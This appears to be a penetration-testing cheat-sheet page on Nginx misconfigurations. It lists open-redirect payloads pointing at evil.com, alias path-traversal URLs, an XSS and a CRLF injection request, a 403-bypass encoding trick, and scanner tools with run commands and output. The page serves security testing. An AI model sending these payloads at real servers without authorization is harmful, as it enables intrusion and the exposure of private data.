Nginx

Nginx misconfiguration

Configuration file

GET /nginx.conf
GET /nginx/nginx.conf

Nginx configuration static analyzer

LogoGitHub - yandex/gixy: Nginx configuration static analyzerGitHub

Open Redirect

https://example.com/%5cevil.com
https://example.com////\;@evil.com
https://example.com////evil.com
https://example.com///evil.com
https://example.com///evil.com/%2f%2e%2e
https://example.com///evil.com@//
https://example.com///{{RootURL}}evil.com/%2f%2e%2e
https://example.com//;@evil.com
https://example.com//\/evil.com/
https://example.com//\@evil.com
https://example.com//\evil.com
https://example.com//\tevil.com/
https://example.com//evil.com/%2F..
https://example.com//evil.com//
https://example.com//evil.com@//
https://example.com//evil.com\tevil.com/
https://example.com//https://evil.com@//
https://example.com/<>//evil.com
https://example.com/\/\/evil.com/
https://example.com/\/evil.com
https://example.com/\evil.com
https://example.com/evil.com
https://example.com/evil.com/%2F..
https://example.com/evil.com/
https://example.com/evil.com/..;/css
https://example.com/https:evil.com

Path traversal via misconfigured NGINX alias

LogoPath traversal via misconfigured NGINX alias - Vulnerabilities - AcunetixAcunetix

https://example.com/static../ returns the same response as https://example.com/

https://example.com/folder1../folder1/folder2/static/main.css
https://example.com/folder1../%s/folder2/static/main.css
https://example.com/folder1/folder2../folder2/static/main.css
https://example.com/folder1/folder2../%s/static/main.css
https://example.com/folder1/folder2/static../static/main.css
https://example.com/folder1/folder2/static../%s/main.css
http://server/api/user -> http://apiserver/v1//user
http://server/apiuser -> http://apiserver/v1/user
LogoNginxHackTricks

Tools

LogoGitHub - hakaioffsec/navgix: navgix is a multi-threaded golang tool that will check for nginx alias traversal vulnerabilitiesGitHub
go get github.com/PuerkitoBio/goquery
go get github.com/cristalhq/acmd
go build


./navgix scan -u http://url.com
LogoGitHub - shiblisec/Kyubi: A tool to discover and exploit Nginx alias traversal misconfiguration, the tool can bruteforce the URL path recursively to find out hidden files and directories.GitHub

Burp extension

LogoGitHub - bayotop/off-by-slash: Burp extension to detect alias traversal via NGINX misconfiguration at scale.GitHub

SCRIPT_NAME

GET /index.php/<script>alert(1)</script>/index.php

Status page

https://example.com/nginx_status

CLRF

http://localhost/%0d%0aDetectify:%20clrf

HTTP/1.1 302 Moved Temporarily
Server: nginx/1.19.3
Content-Type: text/html
Content-Length: 145
Connection: keep-alive
Location: https://example.com/
Detectify: clrf

Any variable

$ curl -H ‘Referer: bar’ http://localhost/foo$http_referer | grep ‘foobar’

Raw backend response reading

Send an invalid HTTP request, such as:

GET /? XTTP/1.1
Host: 127.0.0.1
Connection: close

We will get the following response:

XTTP/1.1 500 Error
Content-Type: text/html
Secret-Header: secret-info

Secret info, should not be visible!

merge_slashes

The merge_slashes directive is set to “on” by default which is a mechanism to compress two or more forward slashes into one, so /// would become /. If Nginx is used as a reverse-proxy and the application that’s being proxied is vulnerable to local file inclusion, using extra slashes in the request could leave room for exploit it.

  1. Detection

  1. Exploit

LogoNGINX may be protecting your applications from traversal attacks without you even knowingAppsFlyer Engineering

Tools

LogoGitHub - stark0de/nginxpwner: Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulnerabilities.GitHub
LogoGitHub - hakaioffsec/navgix: navgix is a multi-threaded golang tool that will check for nginx alias traversal vulnerabilitiesGitHub
./navgix scan -u http://vulnerable.com/                                     
[navgix 2024-12-23_02:12:17.731403583] starting scan on http://vulnerable.com/
[navgix 2024-12-23_02:12:17.830559043] Vulnerable: http://vulnerable.com/assets../
[navgix 2024-12-23_02:12:17.926859226] Vulnerable: http://vulnerable.com/assets../
LogoGitHub - shiblisec/Kyubi: A tool to discover and exploit Nginx alias traversal misconfiguration, the tool can bruteforce the URL path recursively to find out hidden files and directories.GitHub

Reverse Proxy - 403 Bypass

Bypass 403 / 401
GET /api/internal/getAllUsers -> 403
GET /api/internal/getAllUserz -> 404
GET /api/internal/../getAllUsers -> 403
GET /api/internal/getAllUser%73 -> 403

GET /api/internal/getAllUser%2573 -> 200 WIN

%73 =s
%25873 =s

Source: https://www.youtube.com/watch?v=PXqlHAoF2wc

Web Cache Deception

Web Cache

Resources

LogoCommon Nginx misconfigurations - Blog DetectifyBlog Detectify

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

PreviousJettyNextIIS

Last updated